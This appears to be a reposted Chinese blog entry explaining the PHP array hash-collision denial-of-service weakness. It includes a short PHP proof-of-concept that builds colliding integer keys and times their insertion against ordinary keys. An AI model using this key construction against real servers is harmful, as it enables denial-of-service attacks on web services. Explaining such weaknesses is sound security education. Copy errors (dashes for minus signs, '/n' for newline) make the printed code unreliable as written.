• 欢迎访问搞代码网站,推荐使用最新版火狐浏览器和Chrome浏览器访问本网站!
  • 如果您觉得本站非常有看点,那么赶紧使用Ctrl+D 收藏搞代码吧

Array(hash)爆出的冲突问题_php

php 搞代码 3年前 (2018-06-21) 111次浏览 已收录 0个评论

  最近(貌似是28号)从国外(地址:http://nikic.github.com/2011/12/28/Supercolliding-a-php-array.html)爆出了一个关于Array的新PHP冲突,可以利用调用hash表的冲突对服务器进行拒绝服务攻击。

  原理:目前很多语言, 使用hash来存储key – value数据,包括常用的来自用户的POST数据,攻击者可以通过构造请求头,并伴随POST大量的特殊的”key”值(根据每个语言的Hash算法不同而定制),使得语言底层保存POST数据的Hash表因为”冲突”(碰撞)而退化成链表。

 

  这样一来,如果数据量足够大, 那么就可以使得语言在计算,查找,插入的时候, 造成大量的CPU占用,从而实现拒绝服务攻击。

 

  <?php

  $size = pow(2, 16);

  $startTime = microtime(true);

  $array = array();

  for ($key = 0, $maxKey = ($size – 1) * $size; $key <= $maxKey; $key += $size) {

  $array[$key] = 0;

  }

  $endTime = microtime(true);

  echo '插入 ' . $size . ' 个恶意的元素需要 ' . $endTime – $startTime . ' 秒' . "/n";

  $startTime = microtime(true);

  $array = array();

  for ($key = 0, $maxKey = $size – 1; $key <= $maxKey; ++$key) {

  $array[$key] = 0;

  }

  $endTime = microtime(true);

  echo '插入 ' . $size . ' 个普通元素需要 ' . $endTime – $startTime . ' 秒' . "/n";

  /**

  * 结果

  *

  * 插入 65536 个恶意的元素需要 36.357950925827 秒

  * 插入 65536 个普通元素需要 0.029613018035889 秒

  */

欢迎大家阅读《Array(hash)爆出的冲突问题_php》,跪求各位点评,若觉得好的话请收藏本文,by 搞代码


喜欢 (0)
[搞代码]
分享 (0)
发表我的评论
取消评论

表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址